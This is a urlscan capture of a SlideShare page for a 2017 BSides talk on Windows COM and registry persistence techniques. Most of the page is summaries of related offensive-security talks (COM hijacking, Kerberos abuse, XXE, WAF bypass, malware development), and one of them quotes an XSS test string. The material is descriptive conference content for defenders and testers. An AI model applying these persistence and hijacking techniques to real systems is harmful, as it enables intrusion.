de.slideshare.net
Open in
urlscan Pro
151.101.194.152
Public Scan
Submitted URL: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
Effective URL: https://de.slideshare.net/enigma0x3/windows-operating-system-archaeology
Submission: On November 18 via api from US — Scanned from DE
Effective URL: https://de.slideshare.net/enigma0x3/windows-operating-system-archaeology
Submission: On November 18 via api from US — Scanned from DE
Form analysis
1 forms found in the DOM<form data-testid="search-form" role="search"><input name="searchfrom" type="hidden" value="header"><input type="text" autocomplete="off" aria-label="Slideshare durchsuchen" id="nav-search-query" data-cy="search-field" name="q" placeholder="Suche"
value=""><button type="submit" class="SearchForm_submit__U8kPR" id="search-submit" data-cy="search-submit"><span class="Icon_root__AjZyv" style="--size:24px"><span class="Icon_icon__4zzsG"
style="mask-image:url(https://public.slidesharecdn.com/_next/static/media/search.844a289d.svg);background-color:currentColor"></span><span class="sr-only">Suche senden</span></span></button></form>
Text Content
Suche senden HochladenHerunterladen – 30 Tage kostenlosEinloggen WINDOWS OPERATING SYSTEM ARCHAEOLOGY 22. Apr. 2017•Als PPTX, PDF herunterladen• 15 gefällt mir•13.988 aufrufe E enigma0x3Folgen Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM Classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.Weniger lesen Mehr lesen Inhalt melden Inhalt melden 1 von 47 Jetzt herunterladen183-mal heruntergeladen 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Am meisten gelesen 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 Am meisten gelesen 36 Am meisten gelesen 37 38 39 40 41 42 43 44 45 46 47 EMPFOHLEN Windows attacks - AT is the new black von chrisgates Windows attacks - AT is the new black Chris Gates 11.3K aufrufe•76 Folien A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats. COM Hijacking Techniques - Derbycon 2019 von DavidTulis1 COM Hijacking Techniques - Derbycon 2019 David Tulis 6K aufrufe•51 Folien The COM interface lies at the core of Windows, and subtle registry changes can interfere with this the OS in unexpected ways. COM hijacking allows an attacker to load a library into a calling COM-enabled process. It’s a feature, not a bug. While it is commonly used for persistence, some famous COM hijacks have led to more severe exploits. COM hijacking is already used by several families of malware, and it’s time that pentesters caught up on how to abuse this feature. This presentation will cover COM hijacking from start to finish; showing how to discover hijackable COM objects, how to use them offensively, and how to make the calling process remain stable. The blue team will not be forgotten; the talk will cover detection strategies for identifying and defending against COM hijacks. Derbycon - The Unintended Risks of Trusting Active Directory von harmj0y Derbycon - The Unintended Risks of Trusting Active Directory Will Schroeder 39.7K aufrufe•51 Folien Given at DerbyCon 2018, this presentation covers host and Active Directory security descriptor research. Attacker's Perspective of Active Directory von sunnyneo Attacker's Perspective of Active Directory Sunny Neo 1.7K aufrufe•92 Folien This document provides an overview of attack methodologies from an attacker's perspective when targeting Active Directory environments. It discusses initial access techniques, privilege escalation to domain admin rights, maintaining situational awareness through techniques like password spraying and Kerberoasting, and lateral movement tactics like pass the hash and pass the ticket. It also provides mitigation strategies and detection opportunities for defenders. I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di... von DirkjanMollema I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di... DirkjanMollema 19.1K aufrufe•90 Folien Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges. While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory. This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts. The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets. We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups. Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure. Abusing Microsoft Kerberos - Sorry you guys don't get it von gentilkiwi Abusing Microsoft Kerberos - Sorry you guys don't get it Benjamin Delpy 45.8K aufrufe•53 Folien This document discusses abusing Microsoft Kerberos authentication. It provides an overview of how Kerberos authentication works, obtaining users' Kerberos keys from Active Directory or client memory, and using those keys to authenticate as the user without their password through techniques like Pass-the-Hash and Overpass-the-Hash. It also demonstrates these techniques live using mimikatz to dump keys and authenticate with captured keys. Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition) von codewhitesec Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition) CODE WHITE GmbH 7.9K aufrufe•61 Folien This document discusses Java deserialization vulnerabilities and provides an overview of how they work. It notes that many Java technologies rely on serialization which can enable remote code execution if not implemented securely. The document outlines the history of vulnerabilities found, how to find vulnerabilities, and techniques for exploiting them, using examples like the Javassist/Weld gadget. It also summarizes vulnerabilities the speaker's company Code White found, including in products from Symantec, Atlassian, Commvault, and Oracle. SQL injection von RajParmar38 SQL injection Raj Parmar 753 aufrufe•11 Folien This Slide contain information about the SQL injection. Types of SQL injection and some case study about the SQL injection and some technique so we prevent our system Attack and Mitigation for Insecure Deserialization von SukhpreetSingh66 Attack and Mitigation for Insecure Deserialization Sukhpreet Singh 795 aufrufe•15 Folien This document discusses insecure deserialization attacks and ways to mitigate them. It describes how untrusted data can be exploited through deserialization to conduct denial of service attacks, reverse shells, and remote code execution. An example is given of a job search site that blindly trusts user input. The document then recommends never deserializing untrusted data and validating data integrity using techniques like SHA-256 and HMAC signatures to prevent attacks from compromising confidentiality, integrity and availability. It provides code examples of implementing these integrity checks on both the sending and receiving ends. Buffer overflow attacks von gumption Buffer overflow attacks Joe McCarthy 18.4K aufrufe•36 Folien Stack-based and heap-based buffer overflow attacks, based on Counter Hack Reloaded (by Skoudis & Liston), & other sources. Developing High-Impact Malware with Minimal Effort.pptx von elvinguitar Developing High-Impact Malware with Minimal Effort.pptx Elvin Gentiles 1.9K aufrufe•86 Folien Slides from my SANS Hackfest 2022 talk. It discusses how to quickly develop malware despite having minimal programming skills. All techniques are covered from the perspective of someone who has limited time and basic programming skills. XXE: How to become a Jedi von ssuserf09cba XXE: How to become a Jedi Yaroslav Babin 76.8K aufrufe•63 Folien The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation. Thick Application Penetration Testing: Crash Course von nullbind Thick Application Penetration Testing: Crash Course Scott Sutherland 16.9K aufrufe•39 Folien Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities. Catch Me If You Can: PowerShell Red vs Blue von harmj0y Catch Me If You Can: PowerShell Red vs Blue Will Schroeder 7.9K aufrufe•39 Folien This presentation was given at PSConfEU 2017 and covers a survey of PowerShell offensive/defensive projects. Secure coding presentation Oct 3 2020 von moatazk2 Secure coding presentation Oct 3 2020 Moataz Kamel 1.7K aufrufe•37 Folien Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices. The Unintended Risks of Trusting Active Directory von harmj0y The Unintended Risks of Trusting Active Directory Will Schroeder 8.6K aufrufe•46 Folien This presentation was given at Sp4rkCon 2018. It covers the combination of Active Directory and host-based security descriptor backdooring and the associated security implications. No Easy Breach DerbyCon 2016 von MatthewDunwoody1 No Easy Breach DerbyCon 2016 Matthew Dunwoody 42.2K aufrufe•36 Folien Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear) Taking Hunting to the Next Level: Hunting in Memory von JoeDesimone4 Taking Hunting to the Next Level: Hunting in Memory Joe Desimone 3.2K aufrufe•33 Folien This document summarizes memory-based attacker techniques used by malware and the importance of hunting for these techniques in memory. It describes common injection methods like reflective DLL injection and process hollowing. Specific malware examples that use these techniques are provided, like Poison Ivy, Meterpreter, and DarkComet. Existing memory analysis tools are listed as well as a new PowerShell module for hunting injected threads in memory at scale. The PowerShell module detects injected threads by checking for non-image backed memory pages and provides details on suspicious processes and threads. WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour von SoroushDalili WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour Soroush Dalili 54.4K aufrufe•60 Folien Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism. Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project. HTTP HOST header attacks von DefconRussia HTTP HOST header attacks DefconRussia 20.6K aufrufe•29 Folien Sergey Belov - HTTP HOST header attacks Building Advanced XSS Vectors von BruteLogic Building Advanced XSS Vectors Rodolfo Assis (Brute) 8K aufrufe•61 Folien XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog ReCertifying Active Directory von harmj0y ReCertifying Active Directory Will Schroeder 1.9K aufrufe•37 Folien "ReCertifying Active Directory was presented at BlackHat EU 2021 by Will Schroeder and Lee Christensen. Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0 von ASF-WS Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0 Cyber Security Alliance 4.1K aufrufe•51 Folien The document summarizes a presentation about discovering a design issue in .NET's handling of view state fields without integrity protection. During a web application assessment in 2012, the presenter found that custom serialization of view state into an unprotected field could allow tampering by modifying the serialized object graph. This led to the realization that known .NET deserialization behaviors could be triggered remotely by manipulating the view state. A proof-of-concept exploited this by generating view state containing a FileInfo object that deleted a file on the server when deserialized. This uncovered a remote code execution vulnerability in some ASP.NET applications. Fantastic Red Team Attacks and How to Find Them von RossWolf1 Fantastic Red Team Attacks and How to Find Them Ross Wolf 1.1K aufrufe•88 Folien Presented at Black Hat 2019 https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540 Casey Smith (Red Canary) Ross Wolf (Endgame) bit.ly/fantastic19 Abstract: Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible. This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events. Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today. Hunting for Privilege Escalation in Windows Environment von heirhabarov Hunting for Privilege Escalation in Windows Environment Teymur Kheirkhabarov 12.6K aufrufe•99 Folien Slides from my talk at the OFFZONE 2018 conference (https://www.offzone.moscow/report/hunting-for-privilege-escalation-in-windows-environment/) Sql injection in cybersecurity von SanadBhowmik1 Sql injection in cybersecurity Sanad Bhowmik 2.3K aufrufe•12 Folien SQL injection is a code injection technique that attacks data-driven applications. It involves inserting malicious SQL statements into entry fields that are then executed by the database. There are different types of SQL injection attacks, including directly injecting code to immediately execute or injecting into persistent storage to be triggered later. Injection can occur through user input, cookies, or server variables. Prevention techniques aim to stop these types of attacks from harming databases. UEFI Firmware Rootkits: Myths and Reality von SallyFeller UEFI Firmware Rootkits: Myths and Reality Sally Feller 1.1K aufrufe•95 Folien Earlier this month, we teased a proof of concept for UEFI ransomware which was presented at RSA Conference 2017. The HackingTeam, Snowden, Shadow Brokers, and Vault7 leaks have revealed that UEFI/BIOS implants aren't just a theoretical concept but have actually been weaponized by nation states to conduct cyber espionage. Physical access requirements are a thing of the past, these low level implants can be installed remotely by exploiting vulnerabilities in the underlying UEFI system. Today at BlackHat Asia 2017, we are disclosing two vulnerabilities in two different models of the GIGABYTE BRIX platform: GB-BSi7H-6500 – firmware version: vF6 (2016/05/18) GB-BXi7-5775 – firmware version: vF2 (2016/07/19) BlueHat v17 || Dangerous Contents - Securing .Net Deserialization von MSbluehat BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference 16.2K aufrufe•41 Folien Jonathan Birch from Microsoft discusses how misuse of serialization in .NET can lead to remote code execution (RCE) vulnerabilities. He explains how serialization works and how untrusted data streams containing type information can be exploited to instantiate dangerous classes and execute arbitrary code. He provides advice on how to prevent these vulnerabilities, such as using serialization formats without type information, constraining allowed types, and validating streams have not been modified. Inside Out Hacking - Bypassing Firewall von amiable_indian Inside Out Hacking - Bypassing Firewall amiable_indian 3.8K aufrufe•22 Folien The document discusses how firewalls are commonly bypassed using techniques like tunneling traffic over allowed protocols like HTTP and DNS. It provides an example attack scenario where a victim is infected via a client-side exploit delivered over HTTP. While ideal security would involve disconnecting systems, more practical approaches include deep packet inspection, application-aware firewalls, and host-based signatures to detect protocol misuse and anomalous traffic. Commix von nullowaspmumbai Commix nullowaspmumbai 218 aufrufe•20 Folien This document provides an overview of Commix, an open source tool for exploiting and testing for command injection vulnerabilities. It begins with an introduction to command injection attacks and why they occur. It then discusses the different types of command injection, including results-based and blind command injection techniques. The document outlines Commix's architecture, features, and modules. It concludes with recommendations for command injection testbeds and references for further information. WEITERE ÄHNLICHE INHALTE WAS IST ANGESAGT? (20) Attack and Mitigation for Insecure Deserialization von SukhpreetSingh66 Attack and Mitigation for Insecure Deserialization Sukhpreet Singh 795 aufrufe•15 Folien This document discusses insecure deserialization attacks and ways to mitigate them. It describes how untrusted data can be exploited through deserialization to conduct denial of service attacks, reverse shells, and remote code execution. An example is given of a job search site that blindly trusts user input. The document then recommends never deserializing untrusted data and validating data integrity using techniques like SHA-256 and HMAC signatures to prevent attacks from compromising confidentiality, integrity and availability. It provides code examples of implementing these integrity checks on both the sending and receiving ends. Buffer overflow attacks von gumption Buffer overflow attacks Joe McCarthy 18.4K aufrufe•36 Folien Stack-based and heap-based buffer overflow attacks, based on Counter Hack Reloaded (by Skoudis & Liston), & other sources. Developing High-Impact Malware with Minimal Effort.pptx von elvinguitar Developing High-Impact Malware with Minimal Effort.pptx Elvin Gentiles 1.9K aufrufe•86 Folien Slides from my SANS Hackfest 2022 talk. It discusses how to quickly develop malware despite having minimal programming skills. All techniques are covered from the perspective of someone who has limited time and basic programming skills. XXE: How to become a Jedi von ssuserf09cba XXE: How to become a Jedi Yaroslav Babin 76.8K aufrufe•63 Folien The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation. Thick Application Penetration Testing: Crash Course von nullbind Thick Application Penetration Testing: Crash Course Scott Sutherland 16.9K aufrufe•39 Folien Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities. Catch Me If You Can: PowerShell Red vs Blue von harmj0y Catch Me If You Can: PowerShell Red vs Blue Will Schroeder 7.9K aufrufe•39 Folien This presentation was given at PSConfEU 2017 and covers a survey of PowerShell offensive/defensive projects. Secure coding presentation Oct 3 2020 von moatazk2 Secure coding presentation Oct 3 2020 Moataz Kamel 1.7K aufrufe•37 Folien Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices. The Unintended Risks of Trusting Active Directory von harmj0y The Unintended Risks of Trusting Active Directory Will Schroeder 8.6K aufrufe•46 Folien This presentation was given at Sp4rkCon 2018. It covers the combination of Active Directory and host-based security descriptor backdooring and the associated security implications. Attack and Mitigation for Insecure Deserialization von SukhpreetSingh66 Attack and Mitigation for Insecure Deserialization Sukhpreet Singh•795 aufrufe Buffer overflow attacks von gumption Buffer overflow attacks Joe McCarthy•18.4K aufrufe Developing High-Impact Malware with Minimal Effort.pptx von elvinguitar Developing High-Impact Malware with Minimal Effort.pptx Elvin Gentiles•1.9K aufrufe XXE: How to become a Jedi von ssuserf09cba XXE: How to become a Jedi Yaroslav Babin•76.8K aufrufe Thick Application Penetration Testing: Crash Course von nullbind Thick Application Penetration Testing: Crash Course Scott Sutherland•16.9K aufrufe Catch Me If You Can: PowerShell Red vs Blue von harmj0y Catch Me If You Can: PowerShell Red vs Blue Will Schroeder•7.9K aufrufe Secure coding presentation Oct 3 2020 von moatazk2 Secure coding presentation Oct 3 2020 Moataz Kamel•1.7K aufrufe The Unintended Risks of Trusting Active Directory von harmj0y The Unintended Risks of Trusting Active Directory Will Schroeder•8.6K aufrufe ÄHNLICH WIE WINDOWS OPERATING SYSTEM ARCHAEOLOGY (20) Inside Out Hacking - Bypassing Firewall von amiable_indian Inside Out Hacking - Bypassing Firewall amiable_indian 3.8K aufrufe•22 Folien The document discusses how firewalls are commonly bypassed using techniques like tunneling traffic over allowed protocols like HTTP and DNS. It provides an example attack scenario where a victim is infected via a client-side exploit delivered over HTTP. While ideal security would involve disconnecting systems, more practical approaches include deep packet inspection, application-aware firewalls, and host-based signatures to detect protocol misuse and anomalous traffic. Commix von nullowaspmumbai Commix nullowaspmumbai 218 aufrufe•20 Folien This document provides an overview of Commix, an open source tool for exploiting and testing for command injection vulnerabilities. It begins with an introduction to command injection attacks and why they occur. It then discusses the different types of command injection, including results-based and blind command injection techniques. The document outlines Commix's architecture, features, and modules. It concludes with recommendations for command injection testbeds and references for further information. Automated JavaScript Deobfuscation - PacSec 2007 von schenette Automated JavaScript Deobfuscation - PacSec 2007 Stephan Chenette 1.6K aufrufe•35 Folien This document discusses the need for tools and techniques to analyze malicious web content and JavaScript obfuscation, as more malware is delivered through the web. It describes Websense's approach of emulating a browser without rendering content, to allow pages to decode themselves and log all activity. This includes implementing DOM and JavaScript engines. Their system found over 124,000 infected pages from analyzing 111 million URLs in 24 hours. Limitations and other resources are also outlined. Command injection komal_armarkar von KomalArmarkar Command injection komal_armarkar Komal Armarkar 218 aufrufe•21 Folien This document discusses command injection attacks, which occur when unsafe user input is passed to system commands. Command injection allows attackers to execute arbitrary commands on the system. The document provides examples like vulnerabilities in Nvidia software and an insurance company's website. It explains that command injection is possible due to directly calling OS commands or improper sanitization of user input. The document also lists common targets like web apps, routers, printers that are vulnerable, and recommends input validation and escaping values to prevent command injection. ITCamp 2013 - Raffaele Rialdi - Windows Runtime (WinRT) deep dive von ITCamp ITCamp 2013 - Raffaele Rialdi - Windows Runtime (WinRT) deep dive ITCamp 494 aufrufe•26 Folien This document summarizes a presentation about Windows Runtime (WinRT). It discusses how WinRT exposes the operating system through interfaces instead of classes, and how projections make interfaces appear like classes. Runtime security uses capabilities and assigned security identifiers to control access from apps to resources like contacts or files. Understanding the platform details behind projections can help with Windows Store app development. powershell-is-dead-epic-learnings-london von nettitude_labs powershell-is-dead-epic-learnings-london nettitude_labs 2K aufrufe•82 Folien PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer." Thug: a new low-interaction honeyclient von angelodellaera Thug: a new low-interaction honeyclient Angelo Dell'Aera 4.4K aufrufe•23 Folien Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation. Cross interface attack von piyushml20 Cross interface attack piyushml20 283 aufrufe•26 Folien A new attack vector for Web attack whereby backend login console like FTP etc. is used to attack web interface Inside Out Hacking - Bypassing Firewall von amiable_indian Inside Out Hacking - Bypassing Firewall amiable_indian•3.8K aufrufe Commix von nullowaspmumbai Commix nullowaspmumbai•218 aufrufe Automated JavaScript Deobfuscation - PacSec 2007 von schenette Automated JavaScript Deobfuscation - PacSec 2007 Stephan Chenette•1.6K aufrufe Command injection komal_armarkar von KomalArmarkar Command injection komal_armarkar Komal Armarkar•218 aufrufe ITCamp 2013 - Raffaele Rialdi - Windows Runtime (WinRT) deep dive von ITCamp ITCamp 2013 - Raffaele Rialdi - Windows Runtime (WinRT) deep dive ITCamp•494 aufrufe powershell-is-dead-epic-learnings-london von nettitude_labs powershell-is-dead-epic-learnings-london nettitude_labs•2K aufrufe Thug: a new low-interaction honeyclient von angelodellaera Thug: a new low-interaction honeyclient Angelo Dell'Aera•4.4K aufrufe Cross interface attack von piyushml20 Cross interface attack piyushml20•283 aufrufe DIASHOWS FÜR SIE (20) The State of Decentralized Storage von coingecko The State of Decentralized Storage CoinGecko 48.3K aufrufe•16 Folien As NFT projects continue to pop up and censorship woes become a reality, decentralized storage has become a beacon of hope for many. Let’s check out how much the decentralized storage sector has grown! Platform Strategy & Ecosystems von apigee Platform Strategy & Ecosystems Apigee | Google Cloud 18.6K aufrufe•51 Folien The document discusses platform business models and digital ecosystems. It defines a platform business model as one that builds value for multiple sides in a market by consolidating customers and simplifying processes. Examples of digital platform businesses include desktop operating systems, game consoles, and payment systems. The document outlines that platform businesses are built on network effects, and their openness is critical. It also discusses how platform models can generate profits through first and third party usage and build digital ecosystems through virtuous cycles of competition and collaboration. chatgpt dalle.pptx von wolfmap chatgpt dalle.pptx Ellen Edmands 5.7K aufrufe•20 Folien Using ChatGPT can be helpful in presentations to explain concepts in easy-to-understand terms. Pairing that with Dall-E 2 can make your slides fun and interesting. The AI Rush von jeanbaptiste.dumont The AI Rush Jean-Baptiste Dumont 1.1M aufrufe•32 Folien This document provides a summary of fundraising rounds for AI and data startups in Europe in 2016. Some key findings include: - Over 270 startups raised $774 million in 2016, up from $583 million in 2015. - The average funding round was $3.7 million. - France and the UK led fundraising totals, with 108 startups in the UK raising $188 million and 37 startups in France raising $118 million. - Early stage investments boomed, with $215 million invested in 170 early stage startups. - In 2016, focus shifted from marketing applications to technologies using natural language processing, speech recognition and other AI techniques, as well as applications in healthcare, agriculture and other industries Network Effects von a16z Network Effects a16z 777.5K aufrufe•85 Folien Network effects. It’s one of the most important concepts for business in general and especially for tech businesses, as it’s the key dynamic behind many successful software-based companies. Understanding network effects not only helps build better products, but it helps build moats and protect software companies against competitors’ eating away at their margins. Yet what IS a network effect? How do we untangle the nuances of 'network effects' with 'marketplaces' and 'platforms'? What’s the difference between network effects, virality, supply-side economies of scale? And how do we know a company has network effects? Most importantly, what questions can entrepreneurs and product managers ask to counter the wishful thinking and sometimes faulty assumption behind the belief that “if we build it, they will come” … and instead go about more deterministically creating network effects in their business? Because it's not a winner-take-all market by accident. Solve for X with AI: a VC view of the Machine Learning & AI landscape von edslide Solve for X with AI: a VC view of the Machine Learning & AI landscape Ed Fernandez 409.5K aufrufe•37 Folien What you'll get from this deck 1. The M&A race for AI: by the numbers 2. Watch out! hype ahead: definitions & disclaimers 3. Machine Learning drivers: why is Machine Learning a ‘thing’ now (vs before) 4. Venture Capital: forming an industry, the AI/ML landscape 5. The One Hundred (+13) AI startups to watch in the Enterprise 6. The great Enterprise pivot: applying Machine Learning at scale 7. - where to go next - Mobile Is Eating the World (2016) von a16z Mobile Is Eating the World (2016) a16z 1.7M aufrufe•76 Folien In this update of his past presentations on Mobile Eating the World -- delivered most recently at The Guardian's Changing Media Summit -- a16z’s Benedict Evans takes us through how technology is universal through mobile. How mobile is not a subset of the internet anymore. And how mobile (and accompanying trends of cloud and AI) is also driving new productivity tools. In fact, mobile -- which encompasses everything from drones to cars -- is everything. Build Features, Not Apps von natashatherobot Build Features, Not Apps Natasha Murashev 389.6K aufrufe•60 Folien Presented at Tokyo iOS Meetup https://www.meetup.com/TokyoiOSMeetup/events/234405194/ Video here: https://www.youtube.com/watch?v=lJlyR8chDwo The State of Decentralized Storage von coingecko The State of Decentralized Storage CoinGecko•48.3K aufrufe Platform Strategy & Ecosystems von apigee Platform Strategy & Ecosystems Apigee | Google Cloud•18.6K aufrufe chatgpt dalle.pptx von wolfmap chatgpt dalle.pptx Ellen Edmands•5.7K aufrufe The AI Rush von jeanbaptiste.dumont The AI Rush Jean-Baptiste Dumont•1.1M aufrufe Network Effects von a16z Network Effects a16z•777.5K aufrufe Solve for X with AI: a VC view of the Machine Learning & AI landscape von edslide Solve for X with AI: a VC view of the Machine Learning & AI landscape Ed Fernandez•409.5K aufrufe Mobile Is Eating the World (2016) von a16z Mobile Is Eating the World (2016) a16z•1.7M aufrufe Build Features, Not Apps von natashatherobot Build Features, Not Apps Natasha Murashev•389.6K aufrufe KÜRZLICH HOCHGELADEN (20) Reshaping the landscape of belonging to transform community von AllThingsOpen Reshaping the landscape of belonging to transform community All Things Open 20 aufrufe•21 Folien Presented at All Things Open 2024 Presented by Winstina Hughes - Support Inclusion in Tech Title: Reshaping the landscape of belonging to transform community Abstract: The years leading up to being a Fellow on President Barack Obama’s 2012 campaign honed my advocacy skills, teaching me to speak up for myself and my community. Within the WordPress community, I found both refuge and purpose, learning the power of collaboration and global connection. These experiences, like threads woven together, prepared me for an audacious achievement: sending underrepresented speakers from five continents to WordCamps through strategic partnerships. This initiative isn't just about sending speakers; it is about sharing diverse voices, expanding perspectives on leadership, and weaving a more vibrant, interconnected thread throughout the WordPress ecosystem and tech. Join me as I share tools for change that transformed my fear of outsider status into an innovative solution for global connection and inclusivity. This talk is for anyone who has ever felt like they didn't quite belong, whether in an open source conference, slack channel, or within their own skin. By the end of this talk you will have insight on how to reshape belonging in your community to help any member find their true voice even while hiding from it. Find more info about All Things Open: On the web: https://www.allthingsopen.org/ Twitter: https://twitter.com/AllThingsOpen LinkedIn: https://www.linkedin.com/company/all-things-open/ Instagram: https://www.instagram.com/allthingsopen/ Facebook: https://www.facebook.com/AllThingsOpen Mastodon: https://mastodon.social/@allthingsopen Threads: https://www.threads.net/@allthingsopen 2024 conference: https://2024.allthingsopen.org/ ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf von faithlachero13 ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf faithlachero13 117 aufrufe•36 Folien ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdfATI PHARMACOLOGY PROCTORED EXAM 20232024.pdfATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf Character Generation Master 角色生成大師【艾鍗學院】 von IttrainingIttraining Character Generation Master 角色生成大師【艾鍗學院】 IttrainingIttraining 126 aufrufe•98 Folien 艾鍗學院學員專題 - Character Generation Master 角色生成大師 Leader: Mei Member: Emily, Steven, Zero 專題網頁:https://bit.ly/409aXVK 艾鍗官網:https://bit.ly/3ESwHdW 聯絡信箱:service@ittraining.com.tw <專題摘要> 我們開發了一套名為「角色生成大師」的軟體,它是一款融合 AI 